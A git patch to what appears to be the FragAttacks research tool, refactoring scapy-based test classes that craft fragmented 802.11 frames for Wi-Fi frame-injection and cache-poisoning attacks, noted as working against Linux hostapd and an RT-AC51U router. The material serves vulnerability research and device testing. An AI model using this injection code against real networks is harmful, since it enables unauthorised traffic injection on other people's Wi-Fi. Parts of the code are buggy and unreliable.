From 82e308f1b2238a3e21082316eaede8525eaa3ae9 Mon Sep 17 00:00:00 2001 From: Mathy Date: Mon, 30 Mar 2020 13:13:21 -0400 Subject: [PATCH] fragattack: easier definition of tests --- research/inject.py | 327 +++++++++++++++++++++++++-------------------- research/libwifi | 2 +- 2 files changed, 183 insertions(+), 146 deletions(-) diff --git a/research/inject.py b/research/inject.py index 45c0bb8f6..395275b4c 100755 --- a/research/inject.py +++ b/research/inject.py @@ -22,7 +22,7 @@ from scapy.contrib.wpa_eapol import WPA_key #MAC_STA2 = "20:16:b9:b2:73:7a" MAC_STA2 = "80:5a:04:d4:54:c4" -# ---------- Utility Commands ---------- +# ----------------------------------- Utility Commands ----------------------------------- def wpaspy_clear_messages(ctrl): # Clear old replies and messages from the hostapd control interface. This is not @@ -47,7 +47,6 @@ def argv_pop_argument(argument): del sys.argv[idx] return True - class TestOptions(): def __init__(self): # Workaround for ath9k_htc bugs @@ -57,6 +56,38 @@ class TestOptions(): self.clientip = None self.routerip = None +# ----------------------------------- Tests ----------------------------------- + +# XXX --- We should always first see how the DUT reactions to a normal packet. +# For example, Aruba only responded to DHCP after reconnecting, and +# ignored ICMP and ARP packets. +REQ_ARP, REQ_ICMP, REQ_DHCP = range(3) + +def generate_request(sta, ptype): + header = sta.get_header() + if ptype == REQ_ARP: + # XXX --- Add extra checks on the ARP packet + check = lambda p: ARP in p and p.hwsrc == sta.peermac and p.psrc == sta.peerip + request = LLC()/SNAP()/ARP(op=1, hwsrc=sta.mac, psrc=sta.ip, hwdst=sta.peermac, pdst=sta.peerip) + + elif ptype == REQ_ICMP: + label = b"test_ping_icmp" + check = lambda p: ICMP in p and label in raw(p) + request = LLC()/SNAP()/IP(src=sta.ip, dst=sta.peerip)/ICMP()/Raw(label) + + elif ptype == REQ_DHCP: + xid = random.randint(0, 2**31) + check = lambda p: BOOTP in p and p[BOOTP].xid == xid + + rawmac = bytes.fromhex(sta.mac.replace(':', '')) + request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255") + request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid) + request = request/DHCP(options=[("message-type", "discover"), "end"]) + + # We assume DHCP discover is sent towards the AP. + header.addr3 = "ff:ff:ff:ff:ff:ff" + + return header, request, check class Frag(): # StartAuth: when starting the handshake @@ -70,7 +101,7 @@ class Frag(): # Reconnect: force a reconnect GetIp, Rekey, Reconnect = range(3) - def __init__(self, trigger, encrypted, frame=None, flags=None, inc_pn=1): + def __init__(self, trigger, encrypted, header=None, flags=None, inc_pn=1): self.trigger = trigger if flags != None and not isinstance(flags, list): @@ -80,7 +111,7 @@ class Frag(): self.encrypted = encrypted self.inc_pn = inc_pn - self.frame = frame + self.header = header def next_flag(self): if len(self.flags) == 0: @@ -92,16 +123,15 @@ class Frag(): return None return self.flags.pop(0) -class Test(): - # Type of request packet to use in general tests. - # XXX --- We should always first see how the DUT reactions to a normal packet. - # For example, Aruba only responded to DHCP after reconnecting, and - # ignored ICMP and ARP packets. - ARP, ICMP, DHCP = range(3) +class Test(metaclass=abc.ABCMeta): + """ + Base class to define tests. The default defined methods can be used, + but they can also be overriden if desired. + """ def __init__(self, fragments=None): self.fragments = fragments if fragments != None else [] - self.check = None + self.generated = False def next_trigger_is(self, trigger): if len(self.fragments) == 0: @@ -109,11 +139,6 @@ class Test(): return self.fragments[0].next_flag() == None and \ self.fragments[0].trigger == trigger - def next(self): - frag = self.fragments[0] - del self.fragments[0] - return frag - def next_flag(self): if len(self.fragments) == 0: return None @@ -124,6 +149,124 @@ class Test(): return None return self.fragments[0].pop_flag() + def next(self, station): + if not self.generated: + self.generate(station) + self.generated = True + + frag = self.fragments[0] + del self.fragments[0] + return frag + + @abc.abstractmethod + def generate(self, station): + pass + + @abc.abstractmethod + def check(self, p): + pass + +class PingTest(Test): + def __init__(self, ptype, fragments): + super().__init__(fragments) + self.ptype = ptype + self.check_fn = None + + def check(self, p): + if self.check_fn == None: + return False + return self.check_fn(p) + + def generate(self, station): + # Generate the header and payload + header, request, self.check_fn = generate_request(station, self.ptype) + + # Generate all the individual (fragmented) frames + frames = create_fragments(header, request, len(self.fragments)) + + # Assign frames to the existing fragment objects + for frag, frame in zip(self.fragments, frames): + frag.frame = frame + +class LinuxTest(Test): + def __init__(self, ptype): + super().__init__([ + Frag(Frag.Connected, True), + Frag(Frag.Connected, True), + Frag(Frag.Connected, False) + ]) + self.ptype = ptype + + def generate(self, station): + header, request, self.check_fn = generate_request(station, self.ptype) + frag1, frag2 = create_fragments(header, request, 2) + + # Fragment 1: normal + self.fragments[0].frame = frag1 + + # Fragment 2: make Linux update latest used crypto Packet Number + frag2enc = frag2.copy() + frag2enc.SC ^= (1 << 4) | 1 + self.fragments[1].frame = frag2enc + + # Fragment 3: can now inject last fragment as plaintext + self.fragments[2].frame = frag2 + + return test + +class MacOsTest(Test): + """ + See docs/macoxs-reversing.md for background on the attack. + """ + def __init__(self, ptype): + super().__init__([ + Frag(Frag.BeforeAuth, False), + Frag(Frag.BeforeAuth, False) + ]) + self.ptype = ptype + + def generate(self, station): + # First fragment is the start of an EAPOL frame + header = station.get_header(prior=2) + request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32) + frag1, _ = create_fragments(header, data=request, num_frags=2) + + # Second fragment has same sequence number. Will be accepted + # before authenticated because previous fragment was EAPOL. + # By sending to broadcast, this fragment will not be reassembled + # though, meaning it will be treated as a full frame (and not EAPOL). + _, request, self.check_fn = generate_request(station, self.ptype) + frag2 = create_fragments(header, data=request, num_frags=1) + frag2.addr1 = "ff:ff:ff:ff:ff:ff" + + self.fragments[0].frame = frag1 + self.fragments[1].frame = frag2 + +class EapolTest(Test): + # TODO: + # Test 1: plain unicast EAPOL fragment, plaintext broadcast frame => trivial frame injection + # Test 2: plain unicast EAPOL fragment, encrypted broadcast frame => just an extra test + # Test 3: plain unicast EAPOL fragment, encrypted unicast fragment => demonstrates mixing of plain/encrypted fragments + # Test 4: EAPOL and A-MSDU tests? + def __init__(self): + super().__init__([ + Frag(Frag.BeforeAuth, False), + Frag(Frag.BeforeAuth, False) + ]) + + def generate(self, station): + header = station.get_header(prior=2) + request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32) + frag1, frag2 = create_fragments(header, data=request, num_frags=2) + + frag1copy, frag2copy = create_fragments(header, data=request, num_frags=2) + frag1copy.addr1 = "ff:ff:ff:ff:ff:ff" + frag2copy.addr1 = "ff:ff:ff:ff:ff:ff" + + self.fragments[0].frame = frag1 + self.fragments[0].frame = frag2 + +# ----------------------------------- Abstract Station Class ----------------------------------- class Station(): def __init__(self, daemon, mac, ds_status): @@ -236,153 +379,43 @@ class Station(): self.set_header(header, prior=prior, **kwargs) return header - def create_fragments(self, header, data, num_frags): - data = raw(data) - fragments = [] - fragsize = (len(data) + 1) // num_frags - for i in range(num_frags): - frag = header.copy() - frag.SC |= i - if i < num_frags - 1: - frag.FCfield |= Dot11(FCfield="MF").FCfield - - payload = data[fragsize * i : fragsize * (i + 1)] - frag = frag/Raw(payload) - fragments.append(frag) - - return fragments - def encrypt(self, frame, inc_pn=1): self.pn += inc_pn key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx) encrypted = encrypt_ccmp(frame, key, self.pn, keyid) return encrypted - def generate_request(self, ptype): - header = self.get_header() - if ptype == Test.ARP: - # XXX --- Add extra checks on the ARP packet - check = lambda p: ARP in p and p.hwsrc == self.peermac and p.psrc == self.peerip - request = LLC()/SNAP()/ARP(op=1, hwsrc=self.mac, psrc=self.ip, hwdst=self.peermac, pdst=self.peerip) - - elif ptype == Test.ICMP: - label = b"test_ping_icmp" - check = lambda p: ICMP in p and label in raw(p) - request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(label) - - elif ptype == Test.DHCP: - xid = random.randint(0, 2**31) - check = lambda p: BOOTP in p and p[BOOTP].xid == xid - - rawmac = bytes.fromhex(self.mac.replace(':', '')) - request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255") - request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid) - request = request/DHCP(options=[("message-type", "discover"), "end"]) - - # We assume DHCP discover is sent towards the AP. - # XXX Is there an equivalent for against the client? Response to DHCP Discover/Request? - header.addr3 = "ff:ff:ff:ff:ff:ff" - - return header, request, check - - def generate_test_ping(self, ptype, frags): - test = Test(frags) - header, request, test.check = self.generate_request(ptype) - - frames = self.create_fragments(header, request, len(frags)) - for frag, frame in zip(frags, frames): - frag.frame = frame - return test - - def generate_linux_attack_ping(self, ptype): - test = Test() - header, request, test.check = self.generate_request(ptype) - - header = self.get_header() - frag1, frag2 = self.create_fragments(header, request, 2) - - # Fragment 1: normal - test.fragments.append(Frag(frag1, Frag.Connected, True)) - - # Fragment 2: make Linux update latest used crypto Packet Number - frag2enc = frag2.copy() - frag2enc.SC ^= (1 << 4) | 1 - test.fragments.append(Frag(frag2enc, Frag.Connected, True)) - - # Fragment 3: can now inject last fragment as plaintext - test.fragments.append(Frag(frag2, Frag.Connected, False)) - - return test - - def generate_test_eapol(self, num_bytes=16, num_frags=1): - header = self.get_header() - request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32) - frags = self.create_fragments(header, request, num_frags) - - test = Test() - for frag in frags: - test.fragments.append(Frag(frag), Frag.StartAuth, False) - - return test - - def generate_test_eapol_debug(self): - """Here we manually tweak things for ad-hoc tests""" - - header = self.get_header(prior=2) - request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32) - frag1, frag2 = self.create_fragments(header, data=request, num_frags=2) - - frag1copy, frag2copy = self.create_fragments(header, data=request, num_frags=2) - frag1copy.addr1 = "ff:ff:ff:ff:ff:ff" - frag2copy.addr1 = "ff:ff:ff:ff:ff:ff" - - # To generate the tests we need to know the MAC and IP addresses - - test = Test() - #test.fragments.append(Frag(frag1, Frag.BeforeAuth, False)) - #test.fragments.append(Frag(frag2copy, Frag.BeforeAuth, False)) - #test.fragments.append(Frag(frag2copy, Frag.AfterAuth, False)) - test.fragments.append(Frag(header/LLC()/SNAP()/IP()/ICMP(), Frag.AfterAuth, False)) - #test.fragments.append(Frag(frag2, Frag.AfterAuth, True)) - - return test - def generate_tests(self): - self.test = self.generate_test_ping(Test.DHCP, + # Simple ping as sanity check + self.test = PingTest(REQ_ICMP, [Frag(Frag.Connected, True, flags=Frag.GetIp)]) - # Worked against Linux Hostapd and RT-AC51U - self.test = self.generate_test_ping(Test.DHCP, + # Cache poison attack. Worked against Linux Hostapd and RT-AC51U. + self.test = PingTest(REQ_ICMP, [Frag(Frag.Connected, True), - Frag(Frag.Connected, True , flags=Frag.Reconnect)]) + Frag(Frag.Connected, True, flags=Frag.Reconnect)]) - #self.test = self.generate_test_ping(Test.DHCP, + # Two fragments over different PTK keys + #self.test = self.generate_test_ping(REQ_DHCP, # [Frag(Frag.BeforeAuth, True, wait_rekey=True), # Frag(Frag.AfterAuth, True)]) - #self.text = self.generate_test_eapol() - #self.test = self.generate_test_eapol_debug() - #self.test = Test() - #self.test = self.generate_linux_attack_ping() - #self.test = self.generate_test_rekey() - + # TODO: # - Test case to check if the receiver supports interleaved priority # reception. It seems Windows 10 / Intel might not support this. # - Test case with a very lage aggregated frame (which is normally not # allowed but some may accept it). And a variation to check how APs # will forward such overly large frame (e.g. force fragmentation). - - # 1. ============================================================ - # 1.1 Encrypted (= sanity ping test) - # 1.2 Plaintext (= text plaintext injection) - # 1.3 Encrpted, Encrypted - # 1.4 [TKIP] Encrpted, Encrypted, no global MIC - # 1.5 Plaintext, plaintext - # 1.6 Encrypted, plaintext - # 1.7 Plaintext, encrypted - # 1.8 Encrypted, plaintext, encrypted - # 1.9 Plaintext, encrypted, plaintext - # 2. Test 2 but first plaintext sent before installing key + # - 1.1 Encrypted (= sanity ping test) + # 1.2 Plaintext (= text plaintext injection) + # 1.3 Encrpted, Encrypted + # 1.4 [TKIP] Encrpted, Encrypted, no global MIC + # 1.5 Plaintext, plaintext + # 1.6 Encrypted, plaintext + # 1.7 Plaintext, encrypted + # 1.8 Encrypted, plaintext, encrypted + # 1.9 Plaintext, encrypted, plaintext + # 2. Test 2 but first plaintext sent before installing key log(STATUS, "Constructed test case", color="green") @@ -405,7 +438,7 @@ class Station(): frame = None while self.test.next_trigger_is(trigger): - Frag = self.test.next() + Frag = self.test.next(self) if Frag.encrypted: assert self.tk != None and self.gtk != None frame = self.encrypt(Frag.frame, inc_pn=Frag.inc_pn) @@ -519,6 +552,8 @@ class Station(): self.time_connected = None self.handle_connected() +# ----------------------------------- Client and AP Daemons ----------------------------------- + class Daemon(metaclass=abc.ABCMeta): def __init__(self, options): self.options = options @@ -915,12 +950,14 @@ class Supplicant(Daemon): clientmac = scapy.arch.get_if_hwaddr(self.nic_iface) self.station = Station(self, clientmac, "to-DS") +# ----------------------------------- Main Function ----------------------------------- def cleanup(): daemon.stop() if __name__ == "__main__": + log(WARNING, "\nRemember to use a modified backports and ath9k_htc firmware!\n") if "--help" in sys.argv or "-h" in sys.argv: print("\nSee README.md for usage instructions.") quit(1) diff --git a/research/libwifi b/research/libwifi index ac5cb37f3..cb5a4a716 160000 --- a/research/libwifi +++ b/research/libwifi @@ -1 +1 @@ -Subproject commit ac5cb37f36a049fa80edde1716f8392275cb72af +Subproject commit cb5a4a716d65fc13ce0abc7abe3ba6c1d5aca0d8